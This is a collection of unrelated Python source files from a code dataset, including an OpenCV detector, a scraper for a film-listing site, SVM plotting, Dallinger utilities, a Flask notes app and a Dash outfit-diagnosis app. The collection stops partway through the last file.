cv.CascadeClassifier(cascade)\r\n pic = str(pic)\r\n image = cv.imread(pic, 0)\r\n object_blood = blood_cascade.detectMultiScale(image, 1.3, 5)\r\n\r\n for (x, y, w, h) in object_blood:\r\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n cv.putText(image, text, (x + w, y + h), cv.FONT_HERSHEY_DUPLEX, 0.5, (0, 255, 0), 1, cv.LINE_AA)\r\n cv.putText(image, \"Number of \" + text + \"s\" + \" detected: \" + str(object_blood.shape[0]),\r\n (0, image.shape[0] - 10),\r\n cv.FONT_HERSHEY_DUPLEX, 1, (0, 0, 0), 1)\r\n self.imageLabel2.setPixmap(QPixmap(cv.imshow('img', image)))\r\n\r\n def open_change_cascade(self):\r\n self.w.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n window.setWindowTitle('Segmentation')\r\n window.show()\r\n sys.exit(app.exec())\r\n","sub_path":"Python_Code/PyCharm_002/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228824847","text":"from lxml import html\nimport re\nimport requests\n\nfrom containers import Movie, TV_Show, Episode, Source\n\n\nclass Scraper:\n\tdef __init__(self):\n\t\treturn\n\n\t#Find all of the sources for the requested video id (movie or tv episode)\n\tdef scrape_sources(self, video_id):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/membersonly/components/com_iceplayer/video.php?vid=\"+video_id)\n\t\t\n\t\trip_divs = tree.xpath('//div[@class=\"ripdiv\"]') #Get the overall divs\n\n\t\tsources = []\n\t\tfor div in rip_divs:\n\t\t\ttemp = html.tostring(div) #Shouldn't have to do this, but couldn't find a way around\n\t\t\ttree = html.fromstring(temp)\n\n\t\t\tdefinition = tree.xpath('//b')[0].text\n\n\t\t\tsrc_ids = tree.xpath('//a/@onclick')\n\t\t\tsites = tree.xpath('//a[@onclick]/span/text()[1]')\n\n\t\t\ti = 0\n\t\t\tfor src_id in src_ids:\n\t\t\t\tsources.append(Source(src_id[3:-1], sites[i], definition, video_id))\n\t\t\t\ti += 1\n\n\t\treturn sources\n\n\tdef scrape_movie(self, movie_id):\n\t\ttree = get_tree_from_URL(\"http://www.icefilms.info/ip.php?v=\"+movie_id)\n\n\t\ttitle = tree.xpath('//*[@id=\"videotitle\"]/b/span[text()]')\n\t\ttitle = title.pop()\n\n\t\ttitle = title.text.encode('utf-8')\n\t\tyear = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\ttitle = title[:-7]\n\n\t\timdb = tree.xpath('//*[@id=\"info\"]/tr[1]/td/b/text()')\n\t\timdb = imdb.pop()\n\n\t\tself.scrape_sources(movie_id)\n\n\tdef scrape_movies(self, letter):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/movies/a-z/\"+letter.upper())\n\n\t\tmovie_list = tree.xpath('//span[@class=\"list\"]/a[text()]')\n\n\t\tmovies = []\n\t\tfor movie in movie_list:\n\t\t\tmovie_items = movie.items()\n\t\t\tmovie_items = movie_items.pop()\n\n\t\t\ttitle = movie.text_content().encode('utf-8')\n\t\t\tyear = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\t\ttitle = title[:-7]\n\t\t\tmovie_id = movie_items[1]\n\t\t\tmovie_id = movie_id[10:-1]\n\t\t\tmovies.append(Movie(movie_id, year, title))\n\n\t\treturn movies\n\n\tdef scrape_episodes(self, show_id):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/tv/series/\"+show_id)\n\n\t\tepisode_list = tree.xpath('//span[@class=\"list\"]/a[@href]/text()')\n\t\tlinks = tree.xpath('//span[@class=\"list\"]/a/@href')\n\n\t\tepisodes = []\n\t\tfor i in range(0, len(episode_list)):\n\t\t\tlink = links[i]\n\t\t\tnumber = episode_list[i].split()[0]\n\t\t\ttitle = episode_list[i].split()[1:]\n\t\t\ttitle = \" \".join(title)\n\t\t\tepisodes.append(Episode(link[10:-1], number, title, show_id))\n\n\t\treturn episodes\n\n\tdef scrape_tv_shows(self, letter):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/tv/a-z/\"+letter.upper())\n\n\t\ttv_show_list = tree.xpath('//span[@class=\"list\"]/a[text()]')\n\t\tepisodes = tree.xpath('//span[@class=\"list\"]/a[text()]/following-sibling::text()')\n\n\t\ttv_shows = []\n\t\ti = 0\n\t\tfor tv_show in tv_show_list:\n\t\t\ttv_show_items = tv_show.items()\n\t\t\ttv_show_items = tv_show_items.pop()\n\n\t\t\ttitle = tv_show.text_content().encode('utf-8')\n\t\t\t#year = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\t\t#year = year.strip()\n\t\t\tyear = \"????\"\n\t\t\ttitle = title[:-7].strip()\n\t\t\tshow_id = tv_show_items[1]\n\t\t\tshow_id = show_id[11:].strip()\n\t\t\tnum_episodes = episodes[i]\n\t\t\tnum_episodes = num_episodes[:-8].strip()\n\t\t\ti = i+1\n\t\t\ttv_shows.append(TV_Show(show_id, year, num_episodes, title))\n\n\t\treturn tv_shows\n\n\tdef get_tree_from_URL(self, url):\n\t\tpage = requests.get(url)\n\t\treturn html.fromstring(page.text)\n\n\t#Add junk about stuff\n\tdef find_tv_show(self, title):\n\t\tquery = title[0]\n\t\tif title.startswith(\"the \"):\n\t\t\tquery = title[4]\n\n\t\tquery_results = self.scrape_tv_shows(query)\n\t\thits = []\n\t\tfor result in query_results:\n\t\t\tif title in result.title.lower():\n\t\t\t\thits.append(result)\n\n\t\treturn hits\n\n\tdef find_movie(self, title):\n\t\tquery = title[0]\n\t\tif title.startswith(\"the \"):\n\t\t\tquery = title[4]\n\n\t\tquery_results = self.scrape_movies(query)\n\t\thits = []\n\t\tfor result in query_results:\n\t\t\tif title in result.title.lower():\n\t\t\t\thits.append(result)\n\n\t\treturn hits\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463921514","text":"#IMPORTING LIBRARIES\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom sklearn.svm import SVC\n\n#LOADING DATA\nmat=loadmat(\"ex6data2.mat\")\nX=mat[\"X\"]\ny=mat[\"y\"]\n\n#PLOTTING DATA\nm,n = X.shape[0],X.shape[1]\npos,neg = (y==1).reshape(m,1),(y==0).reshape(m,1)\nplt.scatter(X[pos[:,0],0],X[pos[:,0],1],c=\"r\",marker=\"+\",s=50)\nplt.scatter(X[neg[:,0],0],X[neg[:,0],1],c=\"b\",marker=\"o\",s=50)\nplt.xlim(0,1)\nplt.ylim(0.4,1)\nplt.show()\n\n#PLOTTING DECISION BOUNDARY\nclassifier=SVC(kernel=\"rbf\",gamma=30)\nclassifier.fit(X,y.ravel())\nplt.figure(figsize=(8,6))\nplt.scatter(X[pos[:,0],0],X[pos[:,0],1],c=\"r\",marker=\"+\")\nplt.scatter(X[neg[:,0],0],X[neg[:,0],1],c=\"b\",marker=\"o\")\nX_1,X_2 = np.meshgrid(np.linspace(X[:,0].min(),X[:,1].max(),num=100),np.linspace(X[:,1].min(),X[:,1].max(),num=100))\nplt.contour(X_1,X_2,classifier.predict(np.array([X_1.ravel(),X_2.ravel()]).T).reshape(X_1.shape),1,colors=\"g\")\nplt.xlim(0,1)\nplt.ylim(0.4,1)\nplt.show()\n","sub_path":"SVM2.py","file_name":"SVM2.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230089796","text":"\"\"\"\n\"\"\"\n\nimport sys\n\ndef eggDropRec(flr, eggs):\n \n if flr == 0 or flr == 1:\n return flr\n \n if eggs == 1:\n return flr\n \n \n res = sys.maxint\n minval = sys.maxint\n for i in xrange(1, flr+1):\n res = max(eggDropRec(i - 1, eggs - 1), eggDropRec(flr - i, eggs))\n #( egg breaks and below floor or egg dont break check upper flr . return max (worst case)\n minval = min(res, minval)\n \n return minval+1\n\nif __name__ == \"__main__\":\n eggs = 2\n flr = 10\n print(eggDropRec(flr, eggs))\n \n \n ","sub_path":"Dynamic Programming/eggDrop.py","file_name":"eggDrop.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12631436","text":"from pattern.circuit import Control\nimport re\n\nclass entry(Control):\n\n MULTIPART = re.compile('Content-Disposition: form-data; name=\"(.*)\"\\r\\n([^\\0]*)', re.MULTILINE)\n\n def incoming(self, event):\n ct = event.trail.headers[\"content-type\"]\n cl = int(event.trail.headers[\"content-length\"])\n request = event.trail.rfile.read(cl)\n bridge = self.acquireInterface(event, \"request\")\n if bridge is not None:\n if ct.startswith(\"multipart/form-data\"):\n self.multipart(request, bridge)\n else:\n self.singlepart(request, bridge)\n # Send OK\n bridge = self.acquireInterface(event, \"page\")\n if bridge is not None:\n bridge.push()\n else:\n self._sendOK(event)\n \n def _sendOK(self, event):\n page = \"OK\"\n event.trail.send_response(200)\n event.trail.send_header(\"Content-type\", \"text/plain\")\n event.trail.send_header(\"Content-Length\", str(len(page)))\n event.trail.end_headers()\n event.trail.wfile.write(page)\n \n def multipart(self, request, bridge):\n delimiter = request.split(\"\\r\\n\",1)[0] #@@@\n for part in request.split(delimiter):\n mo = self.MULTIPART.match(part.strip())\n if mo:\n name = mo.group(1)\n value = mo.group(2)\n bridge.push(name + \"=\" + value)\n \n def singlepart(self, request, bridge):\n bridge.push(request)\n","sub_path":"tmp/http_parserequest.py","file_name":"http_parserequest.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"604369097","text":"\nimport pytz\nimport datetime\nfrom pytz import timezone\nutc = pytz.utc\ntzinfo = timezone('Europe/Berlin')\n\ndef parse_date(s, tzinfo = utc):\n \"\"\"parse dates like 20121219T160000Z\"\"\"\n year = int(s[0:4])\n month = int(s[4:6])\n day = int(s[6:8])\n hour = int(s[9:11])\n minute = int(s[11:13])\n second = int(s[13:15])\n return datetime.datetime(year, month, day, hour, minute, second, 0, tzinfo)\n","sub_path":"pyallris/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461230918","text":"from __future__ import unicode_literals\nimport functools\nimport io\nimport locale\nimport os\nimport random\nimport shutil\nimport string\nimport subprocess\nimport sys\nimport tempfile\nfrom pkg_resources import get_distribution\n\nfrom dallinger.config import get_config\n\n\ndef get_base_url():\n config = get_config()\n host = os.getenv(\"HOST\", config.get(\"host\"))\n if \"herokuapp.com\" in host:\n if host.startswith(\"https://\"):\n base_url = host\n elif host.startswith(\"http://\"):\n base_url = host.replace(\"http://\", \"https://\")\n else:\n base_url = \"https://{}\".format(host)\n else:\n # debug mode\n base_port = config.get(\"base_port\")\n port = random.randrange(base_port, base_port + config.get(\"num_dynos_web\"))\n base_url = \"http://{}:{}\".format(host, port)\n\n return base_url\n\n\ndef dallinger_package_path():\n \"\"\"Return the absolute path of the root directory of the installed\n Dallinger package:\n\n >>> utils.dallinger_package_location()\n '/Users/janedoe/projects/Dallinger3/dallinger'\n \"\"\"\n dist = get_distribution(\"dallinger\")\n src_base = os.path.join(dist.location, dist.project_name)\n\n return src_base\n\n\ndef generate_random_id(size=6, chars=string.ascii_uppercase + string.digits):\n \"\"\"Generate random id numbers.\"\"\"\n return \"\".join(random.choice(chars) for x in range(size))\n\n\ndef ensure_directory(path):\n \"\"\"Create a matching path if it does not already exist\"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef run_command(cmd, out, ignore_errors=False):\n \"\"\"We want to both send subprocess output to stdout or another file\n descriptor as the subprocess runs, *and* capture the actual exception\n message on errors. CalledProcessErrors do not reliably contain the\n underlying exception in either the 'message' or 'out' attributes, so\n we tee the stderr to a temporary file and if a CalledProcessError is\n raised we read its contents to recover stderr\n \"\"\"\n tempdir = tempfile.mkdtemp()\n output_file = os.path.join(tempdir, \"stderr\")\n original_cmd = \" \".join(cmd)\n p = subprocess.Popen(cmd, stdout=out, stderr=subprocess.PIPE)\n t = subprocess.Popen([\"tee\", output_file], stdin=p.stderr, stdout=out)\n t.wait()\n p.communicate()\n p.stderr.close()\n if p.returncode != 0 and not ignore_errors:\n with open(output_file, \"r\") as output:\n error = output.read()\n message = 'Command: \"{}\": Error: \"{}\"'.format(\n original_cmd, error.replace(\"\\n\", \"\")\n )\n shutil.rmtree(tempdir, ignore_errors=True)\n raise CommandError(message)\n\n shutil.rmtree(tempdir, ignore_errors=True)\n return p.returncode\n\n\nclass CommandError(Exception):\n \"\"\"Something went wrong executing a subprocess command\"\"\"\n\n\nclass GitError(Exception):\n \"\"\"Something went wrong calling a Git command\"\"\"\n\n\nclass GitClient(object):\n \"\"\"Minimal wrapper, mostly for mocking\"\"\"\n\n def __init__(self, output=None):\n self.encoding = None\n if output is None:\n self.out = sys.stdout\n else:\n self.out = output\n\n def init(self, config=None):\n self._run([\"git\", \"init\"])\n if config is not None:\n for k, v in config.items():\n self._run([\"git\", \"config\", k, v])\n\n def add(self, what):\n self._run([\"git\", \"add\", what])\n\n def commit(self, msg):\n self._run([\"git\", \"commit\", \"-m\", '\"{}\"'.format(msg)])\n\n def push(self, remote, branch):\n cmd = [\"git\", \"push\", remote, branch]\n self._run(cmd)\n\n def clone(self, repository):\n tempdir = tempfile.mkdtemp()\n cmd = [\"git\", \"clone\", repository, tempdir]\n self._run(cmd)\n return tempdir\n\n def files(self):\n cmd = [\"git\", \"ls-files\", \"-z\", \"--cached\", \"--others\", \"--exclude-standard\"]\n try:\n raw = check_output(cmd).decode(locale.getpreferredencoding())\n except Exception:\n return set()\n\n result = {item for item in raw.split(\"\\0\") if item}\n return result\n\n def _run(self, cmd):\n self._log(cmd)\n try:\n run_command(cmd, self.out)\n except CommandError as e:\n raise GitError(str(e))\n\n def _log(self, cmd):\n msg = '{}: \"{}\"'.format(self.__class__.__name__, \" \".join(cmd))\n if self.encoding:\n msg = msg.encode(self.encoding)\n self.out.write(msg)\n\n\nclass ParticipationTime(object):\n\n grace_period_seconds = 120\n\n def __init__(self, participant, reference_time, config):\n self.participant = participant\n self.when = reference_time\n self.allowed_hours = config.get(\"duration\")\n self.app_id = config.get(\"app_id\", \"unknown\")\n\n @property\n def assignment_id(self):\n return self.participant.assignment_id\n\n @property\n def allowed_minutes(self):\n return self.allowed_hours * 60\n\n @property\n def allowed_seconds(self):\n return self.allowed_hours * 60.0 * 60.0\n\n @property\n def active_seconds(self):\n delta = self.when - self.participant.creation_time\n return delta.total_seconds()\n\n @property\n def active_minutes(self):\n return self.active_seconds / 60\n\n @property\n def excess_minutes(self):\n return (self.active_seconds - self.allowed_seconds) / 60\n\n @property\n def is_overdue(self):\n total_allowed_seconds = self.allowed_seconds + self.grace_period_seconds\n return self.active_seconds > total_allowed_seconds\n\n\ndef wrap_subprocess_call(func, wrap_stdout=True):\n @functools.wraps(func)\n def wrapper(*popenargs, **kwargs):\n out = kwargs.get(\"stdout\", None)\n err = kwargs.get(\"stderr\", None)\n replay_out = False\n replay_err = False\n if out is None and wrap_stdout:\n try:\n sys.stdout.fileno()\n except io.UnsupportedOperation:\n kwargs[\"stdout\"] = tempfile.NamedTemporaryFile()\n replay_out = True\n if err is None:\n try:\n sys.stderr.fileno()\n except io.UnsupportedOperation:\n kwargs[\"stderr\"] = tempfile.NamedTemporaryFile()\n replay_err = True\n try:\n return func(*popenargs, **kwargs)\n finally:\n if replay_out:\n kwargs[\"stdout\"].seek(0)\n sys.stdout.write(kwargs[\"stdout\"].read())\n if replay_err:\n kwargs[\"stderr\"].seek(0)\n sys.stderr.write(kwargs[\"stderr\"].read())\n\n return wrapper\n\n\ncheck_call = wrap_subprocess_call(subprocess.check_call)\ncall = wrap_subprocess_call(subprocess.call)\ncheck_output = wrap_subprocess_call(subprocess.check_output, wrap_stdout=False)\n","sub_path":"dallinger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444257753","text":"f = open (\"scores.txt\", \"r\")\r\n\r\nusers = {}\r\n\r\nfor line in f:\r\n entry = line.strip().split(\",\")\r\n user = entry[0]\r\n score = entry[1]\r\n users[user] = score\r\n print(user + \": \" + score)\r\n\r\n\t\r\nf.close()\r\n\r\nprint(users)\r\n\r\n ","sub_path":"reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"594870001","text":"from app import apfell, dbloop, apfell_db, db_objects, use_ssl, listen_port, listen_ip, ssl_cert_path, ssl_key_path\r\nimport asyncio\r\nimport ssl\r\n\r\nif __name__ == \"__main__\":\r\n asyncio.set_event_loop(dbloop)\r\n if use_ssl:\r\n context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)\r\n context.load_cert_chain(ssl_cert_path, keyfile=ssl_key_path)\r\n server = apfell.create_server(host=listen_ip, port=listen_port, ssl=context)\r\n else:\r\n server = apfell.create_server(host=listen_ip, port=listen_port)\r\n loop = asyncio.get_event_loop()\r\n task = asyncio.ensure_future(server)\r\n db_objects.database.allow_sync = True # raise AssertionError on ANY sync call, needs to be worked out though\r\n try:\r\n loop.run_until_complete(apfell_db.connect_async(loop=dbloop))\r\n loop.run_forever()\r\n except:\r\n loop.stop()\r\n\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"135025167","text":"import unittest\n\nfrom src.guest import Guest\nfrom src.song import Song\nfrom src.room import Room\n\n\nclass TestGuest(unittest.TestCase):\n\n def setUp(self):\n self.song_1 = Song(\"Ice Ice Baby\", \"Vanilla Ice\")\n self.song_2 = Song(\"Greatest Day\", \"Take That\")\n self.song_3 = Song(\"Especially for You\", \"Kylie and Jason\")\n\n self.songs = [self.song_1, self.song_2, self.song_3]\n\n song = Song(\"Ice, Ice, Baby\", \"Vanilla Ice\")\n self.guest = Guest(\"Nevan\", song)\n \n def test_guest_has_name(self):\n self.assertEqual(\"Nevan\", self.guest.name)\n \n def test_guest_has_favourite_song(self):\n self.assertEqual(\"Ice, Ice, Baby\", self.guest.favourite_song.title)\n \n \n \n","sub_path":"tests/guest_test.py","file_name":"guest_test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299397038","text":"from flask import request, url_for, redirect, render_template\nfrom flask import Blueprint\n\nnotes_api = Blueprint('notes_api', __name__)\n\nfrom models import Note\n\n@notes_api.route(\"/notes/create\", methods=[\"GET\", \"POST\"])\ndef create_note():\n if request.method == \"GET\":\n return render_template((\"notes/create_note.html\"))\n else:\n title = request.form[\"title\"]\n body = request.form[\"body\"]\n note = Note(title=title, body=body)\n note.save()\n return redirect(url_for(\".create_note\"))\n\n@notes_api.route(\"/notes\", methods=[\"GET\"])\ndef notes():\n notes = Note.objects\n return render_template(\"notes/notes.html\", notes=notes)","sub_path":"controllers/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"262264407","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport base64\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport io\nimport random\nimport time\nimport os\nimport json\nimport sys\nimport torch\nimport re\n\nsys.path.insert(0, \"../mcn\")\nimport torchvision.transforms as transforms\nfrom model import CompatModel\nfrom utils import prepare_dataloaders\nfrom PIL import Image\n\ntrain_dataset, _, _, _, test_dataset, _ = prepare_dataloaders(num_workers=1)\n# Load pretrained weights\ndevice = torch.device('cpu')\n# print(len(.vocabulary)) # 2757\nmodel = CompatModel(embed_size=1000, need_rep=True, vocabulary=2757).to(device)\nmodel.load_state_dict(torch.load(\"../mcn/model_train_relation_vse_type_cond_scales.pth\", map_location=\"cpu\"))\nmodel.eval()\nfor name, param in model.named_parameters():\n if 'fc' not in name:\n param.requires_grad = False\n\ndef defect_detect(img, model, normalize=True):\n # Register hook for comparison matrix\n relation = None\n\n def func_r(module, grad_in, grad_out):\n nonlocal relation\n relation = grad_in[1].detach()\n\n for name, module in model.named_modules():\n if name == 'predictor.0':\n module.register_backward_hook(func_r)\n # Forward\n out = model._compute_score(img)\n out = out[0]\n\n # Backward\n one_hot = torch.FloatTensor([[-1]]).to(device)\n model.zero_grad()\n out.backward(gradient=one_hot, retain_graph=True)\n\n if normalize:\n relation = relation / (relation.max() - relation.min())\n relation += 1e-3\n return relation, out.item()\n\ndef item_diagnosis(relation, select):\n \"\"\" Output the most incompatible item in the outfit\n \n Return:\n result (list): Diagnosis value of each item \n order (list): The indices of items ordered by its importance\n \"\"\"\n mats = vec2mat(relation, select)\n for m in mats:\n mask = torch.eye(*m.shape).byte()\n m.masked_fill_(mask, 0)\n result = torch.cat(mats).sum(dim=0)\n order = [i for i, j in sorted(enumerate(result), key=lambda x:x[1], reverse=True)]\n return result, order\n\ndef vec2mat(relation, select):\n \"\"\" Convert relation vector to 4 matrix, which is corresponding to 4 layers\n in the backend CNN.\n \n Args:\n relation: (np.array | torch.tensor) of shpae (60,)\n select: List of select item indices, e.g. (0, 2, 3) means select 3 items\n in total 5 items in the outfit.\n \n Return:\n mats: List of matrix\n \"\"\"\n mats = []\n for idx in range(4):\n mat = torch.zeros(5, 5)\n mat[np.triu_indices(5)] = relation[15*idx:15*(idx+1)]\n mat += torch.triu(mat, 1).transpose(0, 1)\n mat = mat[select, :]\n mat = mat[:, select]\n mats.append(mat)\n return mats\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nroot = \"/home/wangx/fashion_compatibility_mcn/data\"\nroot = \"/mnt/iusers01/fatpou01/matsci01/t80083xw/scratch/fashion_compatibility_mcn/data\"\nimg_root = os.path.join(root, \"images\")\njson_file = os.path.join(root, \"test_no_dup_with_category_3more_name.json\")\n\njson_data = json.load(open(json_file))\n\ntop_options, bottom_options, shoe_options, bag_options, accessory_options = [], [], [], [], []\nprint(\"Load options...\")\nfor cnt, (iid, outfit) in enumerate(json_data.items()):\n if cnt > 10:\n break\n if \"upper\" in outfit:\n label = os.path.join(iid, str(outfit['upper']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n top_options.append({'label': label, 'value': value})\n if \"bottom\" in outfit:\n label = os.path.join(iid, str(outfit['bottom']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n bottom_options.append({'label': label, 'value': value})\n if \"shoe\" in outfit:\n label = os.path.join(iid, str(outfit['shoe']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n shoe_options.append({'label': label, 'value': value})\n if \"bag\" in outfit:\n label = os.path.join(iid, str(outfit['bag']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n bag_options.append({'label': label, 'value': value})\n if \"accessory\" in outfit:\n label = os.path.join(iid, str(outfit['accessory']['index']))\n value = os.path.join(img_root, label) + \".jpg\"\n accessory_options.append({'label': label, 'value': value})\n\n\napp.layout = html.Div([\n html.H1(\"Fashion Outfit Diagnosis\", style={\n \"margin\": \"0.5em 1em 0.5em 1em\"\n }),\n html.Div([\n html.Div([\n html.H4(children=\"Top\"),\n dcc.Dropdown(\n id='top',\n options=top_options,\n value=random.choice(top_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-top\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"bottom\"),\n dcc.Dropdown(\n id='bottom',\n options=bottom_options,\n value=random.choice(bottom_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-bottom\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"shoe\"),\n dcc.Dropdown(\n id='shoe',\n options=shoe_options,\n value=random.choice(shoe_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-shoe\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"bag\"),\n dcc.Dropdown(\n id='bag',\n options=bag_options,\n value=random.choice(bag_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-bag\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Div([\n html.H4(children=\"accessory\"),\n dcc.Dropdown(\n id='accessory',\n options=accessory_options,\n value=random.choice(accessory_options)['value'],\n style={\"float\": \"left\", \"width\": \"300px\"}\n ),\n dcc.Upload(id=\"upload-accessory\", children=['Drop here or ', html.A('Upload')], style={\n \"margin-left\": \"300px\", \"textAlign\": \"center\", \"border\": \"1px dashed black\", \"line-height\": \"34px\", \"height\": \"34px\", \"border-radius\": \"5px\"\n }),\n ], style={\"margin\": \"1em 1em 1em 1em\"}),\n html.Button(id='submit-button', n_clicks=0, children='Submit', style={\n \"margin\": \"1.5em\"\n }),\n ], style={\n \"display\": \"inline-block\",\n \"vertical-align\": \"top\",\n \"width\": \"35%\",\n \"border\": \"1px solid black\",\n \"border-radius\": \"5px\",\n }),\n html.Div([\n html.Div(id=\"input-state\", children=[\n html.H4(children=\"Current outfit\"),\n html.Img(id='top-img', style={\"max-height\":\"150px\", \"margin\":\"5px\"}),\n html.Img(id='bottom-img', style={\"max-height\":\"150px\", \"margin\": \"5px\"}),\n html.Img(id='shoe-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n html.Img(id='bag-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n html.Img(id='accessory-img', style={\"max-height\": \"150px\", \"margin\": \"5px\"}),\n ]),\n html.Div(id=\"output-state\")\n ], style={\n \"display\": \"inline-block\",\n \"vertical-align\": \"top\",\n \"width\": \"60%\",\n \"margin\": \"1em 1em 1em 1em\",\n })\n])\n\n@app.callback(\n Output('top-img', 'src'),\n [Input('top', 'value'), Input('upload-top', 'contents')],\n [State('upload-top', 'filename'),\n State('upload-top', 'last_modified')])\ndef update_top(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('bottom-img', 'src'),\n [Input('bottom', 'value'), Input('upload-bottom', 'contents')],\n [State('upload-bottom', 'filename'),\n State('upload-bottom', 'last_modified')])\ndef update_bottom(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('shoe-img', 'src'),\n [Input('shoe', 'value'), Input('upload-shoe', 'contents')],\n [State('upload-shoe', 'filename'),\n State('upload-shoe', 'last_modified')])\ndef update_shoe(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('bag-img', 'src'),\n [Input('bag', 'value'), Input('upload-bag', 'contents')],\n [State('upload-bag', 'filename'),\n State('upload-bag', 'last_modified')])\ndef update_bag(fname, content, name, date):\n ctx = dash.callback_context\n triggered = ctx.triggered[0]['prop_id']\n if 'upload' in triggered and content is not None:\n content_type, content_string = content.split(',')\n return 'data:image/png;base64,{}'.format(\n content_string)\n elif fname is not None and os.path.exists(fname):\n encoded_img = base64.b64encode(open(fname, \"rb\").read())\n return 'data:image/png;base64,{}'.format(\n encoded_img.decode())\n\n@app.callback(\n Output('accessory-img', 'src'),\n [Input('accessory', 'value'), Input('upload-accessory', 'contents')],\n [State('upload-accessory', 'filename'),\n State('upload-accessory', 